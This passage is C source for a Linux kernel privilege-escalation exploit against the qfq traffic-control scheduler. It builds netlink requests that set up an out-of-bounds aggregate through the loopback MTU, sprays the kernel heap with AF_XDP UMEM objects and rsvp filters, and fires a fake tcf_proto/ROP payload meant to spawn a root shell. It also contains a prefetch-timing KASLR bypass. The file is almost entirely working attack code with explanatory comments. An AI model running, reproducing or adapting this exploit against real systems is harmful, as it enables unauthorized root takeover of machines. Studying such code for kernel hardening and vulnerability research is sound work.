  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = TC_H_ROOT;
  data->tcm_handle = handle;

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to delete class!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Add a helper class to a qdisc.
//
// Sends RTM_NEWTCLASS (NLM_F_CREATE, with ACK) for class `class_handle` under
// the root qdisc of `ifindex`, on the rtnetlink socket `s`.
// - If `lmax` is non-zero, a nested TCA_QFQ_LMAX attribute carries it.
// - If `sub_qdisc_handle` is non-zero, a netem child qdisc with that handle is
//   then attached to the class via create_netem_qdisc().
// bug_worker() also calls this for an already existing class (sub qdisc 0,
// lmax 0) to re-configure it.
// Returns 0 on success, -1 on failure.
int create_helper_class(int s, int ifindex, u32 class_handle, u32 sub_qdisc_handle, u32 lmax) {
  struct nlmsghdr* nlh = calloc(1, 4096);
  if (nlh == NULL) {
    perror("calloc()");
    return -1;
  }

  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWTCLASS;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = TC_H_ROOT;
  data->tcm_handle = class_handle;

  // TCA_OPTIONS, optionally containing TCA_QFQ_LMAX.
  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
  attr->nla_type = TCA_OPTIONS;
  attr->nla_len = NLA_HDRLEN;

  if (lmax) {
    struct nlattr* nested = (void*)attr + NLA_HDRLEN;
    nested->nla_type = TCA_QFQ_LMAX;
    nested->nla_len = NLA_HDRLEN + sizeof(u32);
    attr->nla_len += nested->nla_len;
    *(u32*)((void*)nested + NLA_HDRLEN) = lmax;
  }

  nlh->nlmsg_len += attr->nla_len;

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to create helper class!");
    free(nlh);
    return -1;
  }
  free(nlh);

  if (sub_qdisc_handle != 0) {
    return create_netem_qdisc(s, ifindex, class_handle, sub_qdisc_handle);
  }

  return 0;
}

// Create an AF_XDP socket and register `buf` as its UMEM: 4 chunks of 0x1000
// bytes, no headroom, no flags. The kernel UMEM object created this way is
// used as heap spray material.
// Returns the socket fd on success (the caller owns it and must close it), or
// -1 on failure. The socket is closed if registration fails.
int spray_one_umem(void* buf) {
  struct xdp_umem_reg mr = {0};
  // __u64 addr; /* Start of packet data area */
  // __u64 len; /* Length of packet data area */
  // __u32 chunk_size;
  // __u32 headroom;
  // __u32 flags;

  mr.addr = (u64)buf;
  mr.chunk_size = 0x1000;
  mr.len = 4 * 0x1000; // anything other than 8 is fine (8 is the protocol we try to classify with the fake proto)
  mr.headroom = 0;
  mr.flags = 0;

  int s = socket(AF_XDP, SOCK_RAW, 0);
  FAIL_IF(s < 0);

  if (setsockopt(s, SOL_XDP, XDP_UMEM_REG, &mr, sizeof(mr)) < 0) {
    perror("setsockopt(XDP_UMEM_REG)");
    // Report first: close() may overwrite errno.
    close(s);
    return -1;
  }
  return s;
}

// Worker to spray qdiscs and potentially trigger the vulnerability.
// Each worker will have its own network namespace and create qdiscs
// for the loopback device.
// We could create virtual devices, but here we are.
//
// Sequence, as driven by main():
//  1. Read this worker's index from *arg, pin to CPU 0, bring "lo" up with
//     MTU = LMAX, and create a qfq root qdisc. That qdisc also carries one
//     copy of the fake_group size table.
//  2. Register AF_XDP UMEMs backed by `payload` before and after creating
//     one rsvp filter on that qdisc. Then signal parent_notify and wait for
//     wake == index.
//  3. If this worker is qdisc_trigger_bug:
//       - create the helper and OOB classes,
//       - enqueue one packet into each,
//       - re-configure the OOB class to trigger the bug.
//     Otherwise: send one UDP packet over loopback and check maybe_win().
//  4. Signal parent_notify, wait again, and return -1 when woken.
// Returns -1 on any setup failure, and 0 if `done` becomes non-zero while
// waiting.
// NOTE(review): sockets are not closed on the FAIL_IF error paths.
int bug_worker(void* arg) {
  int i = *(int*)arg;

  FAIL_IF(_pin_to_cpu(0) != 0);

  // qdisc handle has major 0x1000 | i; the class minors are 1, 2 and 4.
  const u32 handle = 0x10000000 | (i << 16);
  const u32 handle_oob = handle | (1 << 0);
  const u32 handle_help = handle | (1 << 1);
  const u32 handle_faked1 = handle | (1 << 2);

  const u32 sub_handle_help = 0x20010000;
  const u32 sub_handle_oob = 0x20020000;

  const int loindex = if_nametoindex("lo");

  int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  FAIL_IF(s < 0);

  struct sockaddr_nl addr = {0};
  addr.nl_family = AF_NETLINK;

  FAIL_IF(bind(s, (struct sockaddr*)&addr, sizeof(addr)) < 0);

  // Up the device and set the MTU to LMAX, which will trigger the vulnerability
  // later on.
  if (prepare_device(s, loindex) < 0) {
    return -1;
  }

  // Prepare qfq qdisc without anything else.
  // Eventually we will create everything of interest when we pull the trigger.
  // Until that this qdisc serves as some kind of "grooming" object.
  if (create_qfq_qisc(s, loindex, TC_H_ROOT, handle) < 0) {
    return -1;
  }

  #define NUM_SOCKETS2 4
  int payloads[NUM_SOCKETS2*2] = {0};

  // Block until main() sets wake to this worker's index, then clear it.
  // Uses the function-level `i`; the loop variables named `i` below are
  // scoped to their loops. Returns 0 from bug_worker if `done` is set.
  #define _WAIT_FOR_WAKEUP() { \
    while (wake != i) { \
      sleep(1); \
      if (done) { \
        return 0; \
      } \
    } \
    wake = 0; \
  }

  // payloads[] was just zero-initialised, so this loop closes nothing here.
  for (int i = 0; i < NUM_SOCKETS2*2; i++) {
    if (payloads[i] > 0) {
      close(payloads[i]);
      payloads[i] = 0;
    }
  }
  // Surround the filter's allocation with UMEM registrations.
  for (int i = 0; i < NUM_SOCKETS2; i++) {
    payloads[i] = spray_one_umem(payload);
    FAIL_IF(payloads[i] < 0);
  }
  FAIL_IF(create_tcfilter(s, loindex, handle, 0x1111) != 0);
  for (int i = 0; i < NUM_SOCKETS2; i++) {
    payloads[i + NUM_SOCKETS2] = spray_one_umem(payload);
    FAIL_IF(payloads[i + NUM_SOCKETS2] < 0);
  }

  EVENT_SET(parent_notify);
  _WAIT_FOR_WAKEUP();

  if (i == qdisc_trigger_bug) {
    L("worker %d is entering stage 1b: trigger vulnerability", i);

    L("trying to prepare helper class ..");
    // This is a real helper class: We use it to make the code below follow
    // certain paths in sch_qfq.c
    // We require the following:
    //  - qfq_sch->in_serv_agg != NULL
    //  - qfq_sch->in_serv_agg != OOB agg
    // We use a netem qdisc with a large delay to consistently hit the window
    // between qfq_enqueue -> qfq_dequeue where the in_serv_agg would be reset.
    if (create_helper_class(s, loindex, handle_help, sub_handle_help, 0x1000) != 0) {
      E("failed to create helper class :(");
      return -1;
    }

    L("trying to prepare oob class ..");
    // Class which will carry the aggregate with the OOB group
    // In order to hit the desired update code paths, this class needs
    // packets in its (sub)qdisc.
    if (create_helper_class(s, loindex, handle_oob, sub_handle_oob, 0x2000) != 0) {
      E("failed to create oob class :(");
      return -1;
    }

    L("activating helper agg ..");
    u8 buf[1] = {0};

    int sc, ss;
    struct sockaddr_in addr;
    u32 addr_len;

    ss = socket(AF_INET, SOCK_DGRAM, 0);
    FAIL_IF(ss < 0);
    sc = socket(AF_INET, SOCK_DGRAM, 0);
    FAIL_IF(sc < 0);

    addr.sin_family = AF_INET;
    addr.sin_port = 0;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);

    addr_len = sizeof(addr);

    // Bind to an ephemeral loopback port and read it back as the destination.
    FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0);
    FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0)

    // SO_PRIORITY is set to the class handle so that each packet below is
    // steered into that class.
    // set in_serv_agg = helper agg
    FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_help, sizeof(handle_help)) < 0);
    FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0);

    // make (not-yet) oob class active
    FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_oob, sizeof(handle_oob)) < 0);
    FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0);

    // trigger vulnerability
    // This will create a qfq_aggregate with an OOB group as controlled
    // by the MTU we set earlier.
    if (create_helper_class(s, loindex, handle_oob, 0, 0) != 0) {
      E("failed to trigger vulnerability :(");
      return -1;
    }

    close(ss);
    close(sc);

    EVENT_SET(parent_notify);
    _WAIT_FOR_WAKEUP();
    return -1;
  }

  {
    // trigger payload
    // Send one packet through this namespace's qdisc, then check whether the
    // payload succeeded.

    int sc, ss;
    struct sockaddr_in addr;
    u32 addr_len;
    ss = socket(AF_INET, SOCK_DGRAM, 0);
    FAIL_IF(ss < 0);
    sc = socket(AF_INET, SOCK_DGRAM, 0);
    FAIL_IF(sc < 0);

    addr.sin_family = AF_INET;
    addr.sin_port = 0;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);

    addr_len = sizeof(addr);

    FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0);
    FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0)

    // trigger, what we send does not matter
    FAIL_IF(sendto(sc, &addr, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0);

    // Does not return if the payload worked (execs a shell).
    maybe_win();

    // payload failed ..
    EVENT_SET(parent_notify);
    _WAIT_FOR_WAKEUP();

    return -1;
  }
}

// Orchestrates the run:
//  - pins itself to CPU 1 (workers pin themselves to CPU 0);
//  - relocates the gadget addresses, either from a hex kernel base given as
//    argv[1] or via the get_kernel_base() timing probe;
//  - builds the fake tcf_proto/ROP payload and the fake_group blob;
//  - makes up to 10 attempts. Each attempt:
//      * spawns ATTEMPT_LARGE_EVERY workers one at a time, waiting until each
//        has finished its spray;
//      * wakes worker qdisc_trigger_bug to trigger the bug;
//      * wakes every other worker in turn to fire its payload.
//    If a worker's maybe_win() succeeds, that worker execs a shell instead of
//    signalling back. After a failed attempt all workers are killed.
// Returns 0 after every attempt failed, -1 on setup errors.
int main(int argc, char* argv[]) {
  // main orchestration routine.

  // Hopefully less noise due to thread creation
  FAIL_IF(_pin_to_cpu(1) != 0);

  if (argc == 2) {
    u64 base = strtoull(argv[1], NULL, 16);
    L("using supplied kernel base: %llx", base);
    u64 diff = base - 0xffffffff81000000ull;
    L("diff: %llx", diff);

    #define __x(name) { name += diff; L("corrected %s to %p", #name, (void*)name); }
    FOR_ALL_OFFSETS(__x);
    #undef __x
  } else {
    FAIL_IF(get_kernel_base() < 0);
  }


  payload = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
  FAIL_IF(payload == MAP_FAILED);
  prep_tcf_proto_payload(payload);
  prep_stage1_large_payload(&fake_group);

  for (int try = 0; try < 10; try++) {
    int worker_i = 1;

    L("spraying qdiscs ..");
    // Each worker reads *(&worker_i) as its first action. We wait for that
    // worker's parent_notify before worker_i is incremented again.
    for (worker_i = 1; worker_i <= ATTEMPT_LARGE_EVERY; worker_i++) {
      FAIL_IF(spawn_worker(&bug_worker, &worker_i) < 0);
      EVENT_WAIT(parent_notify);
    }

    // The loop leaves worker_i one past the last spawned index.
    worker_i--;
    // NOTE(review): hard-coded; must not exceed ATTEMPT_LARGE_EVERY.
    qdisc_trigger_bug = 10;

    wake = qdisc_trigger_bug;
    EVENT_WAIT(parent_notify);

    L("triggering payloads ..");
    for (int i = 1; i <= worker_i; i++) {
      if (i != qdisc_trigger_bug) {
        wake = i;
        EVENT_WAIT(parent_notify);
      }
    }

    E("attempt failed .(");
    while (last_worker > 0) {
      kill_worker(last_worker - 1);
    }
    sleep(1);
  }

  E("we failed .(");
  return 0;
}

// KASLR bypass
//
// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h
//
// Read the time-stamp counter at the start of a timed region. An mfence
// precedes RDTSCP and an lfence follows it, to keep surrounding memory
// operations from moving across the read. Returns the 64-bit value
// assembled from edx:eax.
inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
  uint64_t a, d;
  asm volatile ("mfence\n\t"
    "RDTSCP\n\t"
    "mov %%rdx, %0\n\t"
    "mov %%rax, %1\n\t"
    "xor %%rax, %%rax\n\t"
    "lfence\n\t"
    : "=r" (d), "=r" (a)
    :
    : "%rax", "%rbx", "%rcx", "%rdx");
  a = (d<<32) | a;
  return a;
}

// Read the time-stamp counter at the end of a timed region. An lfence
// precedes RDTSCP and an mfence follows it. Returns the 64-bit value
// assembled from edx:eax.
inline __attribute__((always_inline)) uint64_t rdtsc_end() {
  uint64_t a, d;
  asm volatile(
    "xor %%rax, %%rax\n\t"
    "lfence\n\t"
    "RDTSCP\n\t"
    "mov %%rdx, %0\n\t"
    "mov %%rax, %1\n\t"
    "mfence\n\t"
    : "=r" (d), "=r" (a)
    :
    : "%rax", "%rbx", "%rcx", "%rdx");
  a = (d<<32) | a;
  return a;
}


// Issue prefetchnta and prefetcht2 hints for address p. x86 prefetch
// instructions do not fault, which is why get_kernel_base() can pass it
// arbitrary kernel addresses.
void prefetch(void* p)
{
  asm volatile ("prefetchnta (%0)" : : "r" (p));
  asm volatile ("prefetcht2 (%0)" : : "r" (p));
}


// Size of the buffer swept by flush_cache(). Presumably chosen to exceed the
// CPU's last-level cache — TODO confirm for the target CPU.
#define FLUSH_SIZE (4*1024*1024)
u8 __mem[FLUSH_SIZE];

// Write every byte of __mem so that other data is pushed out of the caches
// before a timing measurement.
//
// This is `static inline`, not a plain `inline`: in C99/C11 a non-static,
// non-extern `inline` definition emits no external symbol, so any call the
// compiler does not inline (e.g. at -O0) would fail to link.
static inline void flush_cache(void) {
  for (int i = 0; i < FLUSH_SIZE; i++) {
    __mem[i] = i;
  }
}

// Time a single prefetch of `addr` after evicting caches with flush_cache().
// Returns the elapsed TSC ticks between rdtsc_begin() and rdtsc_end().
// The statement order is what is being measured; do not reorder.
size_t flushandreload(void* addr) // row miss
{
  flush_cache();
  size_t time = rdtsc_begin();
  prefetch(addr);
  size_t delta = rdtsc_end() - time;
  return delta;
}

// Estimate the randomized kernel text base with a prefetch timing probe, store
// it in leak_kernel_base, and shift every address in FOR_ALL_OFFSETS by the
// resulting slide.
//
// Every candidate START + k*STEP in [START, END) is timed 16 times with
// flushandreload(), keeping the minimum per candidate. The candidate with the
// smallest minimum is taken as the base.
// Returns 0 on success, -1 if no candidate was selected.
int get_kernel_base() {
  L("getting kernel base address ..");

  #define START 0xffffffff80000000ull
  #define END 0xfffffffff0000000ull
  #define STEP 0x0000000001000000ull
  size_t times[(END - START) / STEP] = {0};

  for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
    times[ti] = ~0;
  }

  // Best-case (minimum) prefetch time per candidate over 16 rounds.
  for (int i = 0; i < 16; i++) {
    for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
      u64 addr = START + STEP * (u64)ti;
      size_t t = flushandreload((void*)addr);
      if (t < times[ti]) {
        times[ti] = t;
      }
    }
  }

  // Pick the fastest candidate. `mini` is signed so that -1 is a usable
  // "nothing selected" sentinel. As a size_t, `mini < 0` could never be true,
  // and times[mini] would then read out of bounds.
  // NOTE(review): the last candidate is excluded from the search — confirm
  // whether that is intentional.
  size_t minv = ~0;
  int mini = -1;
  for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) {
    if (times[ti] < minv) {
      mini = ti;
      minv = times[ti];
    }
  }

  if (mini < 0) {
    return -1;
  }

  leak_kernel_base = START + STEP * (u64)mini;
  L("likely kernel base: %p (%zu)", (void*)leak_kernel_base, times[mini]);

  // Slide relative to the default base the gadget table was written for;
  // subtracting it relocates each address.
  i64 diff = 0xffffffff81000000 - leak_kernel_base;
  L("diff: %lld", diff);

  #define __x(name) { name -= diff; L("corrected %s to %p", #name, (void*)name); }
  FOR_ALL_OFFSETS(__x);
  #undef __x
  return 0;
}
